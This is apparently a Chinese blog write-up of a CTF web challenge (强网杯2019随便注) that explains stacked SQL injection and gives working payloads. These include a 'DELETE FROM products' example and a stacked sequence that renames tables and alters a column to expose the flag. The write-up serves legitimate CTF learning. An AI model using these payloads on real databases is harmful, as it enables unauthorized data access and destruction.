[buu-web] 强网杯2019随便注

最新推荐文章于 2024-06-28 09:28:07 发布
最新推荐文章于 2024-06-28 09:28:07 发布
阅读量4k 收藏
点赞数
分类专栏: CTF-web 渗透之路 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53146913/article/details/123267445
版权

0x01堆叠注入原理(Stacked Queries)

在sql中,分号表示一条语句的结束。如果在分号(;)的后面再加一条语句,这条语句也可以被执行,继续加一个分号和一条语句,这样就可以在一次数据库的调用中执行多个语句。

举个例子:

输入:DELETE FROM products(未对输入的参数进行过滤)

服务器端生成的sql语句为:Select * from products where productid=1;DELETE FROM products当执行查询后,第一条显示查询信息,第二条则将整个表进行删除。

堆叠注入的局限性

堆叠注入并不是在每种情况下都能使用的。大多数时候,因为API或数据库引擎的不支持,堆叠注入都无法实现。

0x02 进行注入尝试,获取信息

1、输入1’发现不回显,然后1’ #显示正常,应该是存在sql注入了

2、尝试 1' or 1=1; #

 3、正常流程走起,order by 。

输入1' order by 3; # 时出现报错信息。

说明只有两个字段。

4、使用联合查询,遇到过滤信息。

 

返回一个正则过滤规则,几乎所有常用的字段都被过滤了。

5、尝试进行堆叠注入

 故可以存在堆叠注入。

6、进行查表。

 6.1、查询两个表中的字段。

 7、!!!!找到flag,接下来想办法获取flag

由于每次回显都是从 word 这张表中,所以推测内部的查询语句为:

select id, data from word where id =

(这里从上面的对word列的查询可以看到它是有两列,id和data)

然而过滤正则并没有过滤alert和rename关键字。

8、构造堆叠注入的payload,获取flag

        1.将words表改名为words2或其它任意名字

         2.1919810931114514改名为words

        3.将新的word表插入一列,列名为id

        4.将flag列改名为id

1';rename table `words` to words2; 
rename table `1919810931114514` to `words`;
alter table words change flag id varchar(100);
show tables; 
show columns from words;#

最后用1' or 1=1;#
求出flag

 0x03 重学SQL语句

想要在sql注入里更加灵活则必须对语句、函数有足够的熟悉。

一起对SQL语句进行复习吧!

SQL 教程icon-default.png?t=M1L8https://www.w3school.com.cn/sql/index.aspSQL学习,将会在明天更新。。。。

菜菜zhao
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Stacked Queries(堆叠入)
qq_45521281的博客
03-28 3499
文章目录基本知识原理介绍:堆叠入的局限性Mysql数据库实例介绍CTF 实战与各种姿势修改表名利用HANDLER语句利用MySql预处理正常利用MySql预处理配合十六进制绕过关键字MySql预处理配合字符串拼接绕过关键字 Stacked injection 汉语翻译过来后,国内有的称为堆查询入,也有称之为堆叠入。个人认为称之为堆叠入更为准确。堆叠入为攻击者提供了很多的攻击手段,通过添加一个新的查询或者终止查询( ; ),可以达到 修改数据 和 调用存储过程 的目的。这种技术在SQL入中还是比较
[强网杯 2019]随便 1-堆叠
qq_43564182的博客
07-10 520
解题 0x01 堆叠入学习(堆叠查询,Stacked Queries) 堆叠入为攻击者提供了很多控制权,与仅限于SELECT语句的UNION联合查询攻击不同,堆叠入可以用于执行任何SQL语句。 堆叠入原理 在sql中,分号表示一条语句的结束。如果在分号的后面再加一条语句,这条语句也可以被执行,继续加一个分号和一条语句,这样就可以在一次数据库的调用中执行多个语句。 举个堆叠入攻击的例子 执行查询时,第一个语句执行信息查询,第二个语句则将表user的所有内容给删除了。 mysql> select
SQL Server验证堆叠
测试进阶之路
12-02 1199
堆叠入原理SQL入之堆叠入 堆叠入原理主要是因为后台处理sql语句的方法可以支持多条sql同时执行,例如mysli_multi_query(),为了防止入可以改成mysqli_query()函数 本篇内容主要针对安全测试方面对这个漏洞进行验证 首先是通过sqlmap扫描时,扫描出该漏洞,漏洞显示类型为 stacked queries 从图上可以看出该请求的有效载荷为 id=123’);WAITFOR DELAY ‘0:0:5’–,即输入该参数可验证该漏洞,使用浏览器访问该请求,并将参数设置为有
Stacked Queries堆叠入(强网杯2019随便---堆叠、修改表名和字段名、HANDLER ... READ)
qq_45521281的博客
04-28 1493
Stacked injection 汉语翻译过来后,国内有的称为堆查询入,也有称之为堆叠入。个人认为称之为堆叠入更为准确。堆叠入为攻击者提供了很多的攻击手段,通过添加一个新的查询或者终止查询( ; ),可以达到 修改数据 和 调用存储过程 的目的。这种技术在SQL入中还是比较频繁的。 基本知识 原理介绍: **在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下,我们在结束一...
sql入进阶/user-agent/基于报错的入/保姆级教程/一看就会/
ChenD的学习笔记
10-08 1002
基于user-agent 和报错的盲
BUU刷题-Reveser-FlareOn5-Web2.0(WebAssembly逆向分析)
05-26
BUU刷题-Reveser-FlareOn5_Web2.0(WebAssembly逆向分析)
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
05-26
BUU-Reveser-XMAN2018排位赛_easywasm(WebAssembly逆向分析)
POSN:POSN-BUU的源代码
04-01
POSN POSN-BUU的源代码
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
2020网鼎杯青龙组Boom
05-12
2020网鼎杯青龙组Boom。如果需要的可以下载,其实就是解方程而已,没啥难度。
MYSQL入天书之stacked injection
weixin_34221332的博客
08-11 635
第三部分/page-3 Stacked injection Background-8 stacked injection Stacked injections:堆叠入。从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在mysql中,主要是命令行中,每一条语句结尾加 ; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做stacked...
Stacked Regression的详细步骤和使用意事项
weixin_30719711的博客
06-18 1055
声明:这篇博文是我基于一篇网络文章翻译的,并结合了自己应用中的一些心得,如果有侵权,请联系本人删除。 最近做推荐的时候,开始接触到Stacking方法,在周志华老师的西瓜书中,Stacking方法是在Bagging,Bosting方法后的模型集成方法,和投票法,简单平均法,加权平均法等方法在同一个讨论框架中。在网上查资料,也有学者认为Stacking方法是和Bagging,Bost...
SQLi Labs Stacked Injections ( Lesson38 - Lesson53 )
1ame的博客
08-30 1319
第三部分:Stacked Injection Stacked Queries Execute multiple statements in the same query to extend the possibilities of SQL injections Stacked queries provide a lot of control to the attacker.
Python全栈(五)Web安全攻防之3.sqlmap的使用介绍
CUFEECR的博客
02-27 5060
SQL入,就是通过把SQL命令插入到web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令;Sqlmap的输出信息按从简到繁共分为7个级别依次为0、1、2、3、4、5和6;sqlmap获取目标的方式有直连数据库、指定目标URL和读取不同文件类型进行SQL入3种方式。sqlmap设置请求参数的类型包括HTTP方法、设置post提交参数、设置cookie参数、设置user-agent、设置代理、设置延迟、设置超时、设置超时重试次数、设置随机参数、设置忽略401和避免被屏蔽等。
简单的sql入之2WP
热门推荐
Yale的博客
03-19 1万+
这里我们会用到tamper,是python写的,sqlmap一般自带,主要的作用是绕过WAF 空格被过滤可以使用space2comment.py,过滤系统对大小写敏感可以使用randomcase.py等等流程和简单的sql入之3是一样的,不过加了–tamper而已 就不截图了,以下是我从KALI的终端上复制的 这里用的level参数是执行测试的等级(1-5,默认为1) sqlmap默认测
SQLI-LAB  的 实战记录(Less 41 - Less 53)
这块盾牌有待改良
07-20 2706
Less - 41 stacked Query Intiger type blind Less - 42 Stacked Query error based Less - 43 stacked Query String type
实战SQL
weixin_33688840的博客
08-13 242
SQL入是啥就不解释了。下面演示一个SQL入的例子 SQL入点可以自己尝试或用SQL入漏洞扫描工具去寻找,这里用大名鼎鼎的sqlmap演示一个现成的案例。 1.漏洞试探 root@kali:~# sqlmap -u http://xxx.njnu.edu.cn/fjlist.asp?id=87 sqlmap/1.0-dev - automatic SQL injec...
MyBatis-Plus 查询不到数据,但使用 SQL 可以查询到数据的问题排查
weixin_74268571的博客
06-22 1022
MyBatis-Plus 查询不到数据,但使用 SQL 可以查询到数据的问题详细排查和解决方案
如何设置SQL Server端口:确保数据库连接的最佳实践
最新发布
06-28 463
在现代企业环境中,SQL Server作为微软的关系数据库管理系统,广泛应用于数据存储、分析和管理。然而,默认配置并不总能满足特定的网络安全和性能要求。因此,了解如何设置SQL Server端口对于优化数据库连接和确保网络安全至关重要。本文将详细探讨SQL Server端口的配置步骤、意事项及最佳实践,帮助读者在复杂网络环境中有效管理数据库连接。
buu ctf web进阶]ssti
08-23
buu ctf web进阶中,ssti代表 Side Template Injection,是一种应用程序中的安全漏洞。通过此漏洞,攻击者可以入恶意代码到服务器端的模板引擎,从而执行任意代码或获取敏感信息。这种漏洞可能导致服务器被入侵,用户数据泄露等安全问题。在比赛中,参赛者需要学习ssti的原理和常见的攻击方法,并利用它来获取目标系统的flag。在比赛中,常见的ctf题目会提供一些模板入的挑战,参赛者需要在给定的条件下,构造合适的payload来实现攻击目标。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [(wp)ctfweb-buu中ssti模板入](https://blog.csdn.net/qq_51862722/article/details/118685275)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值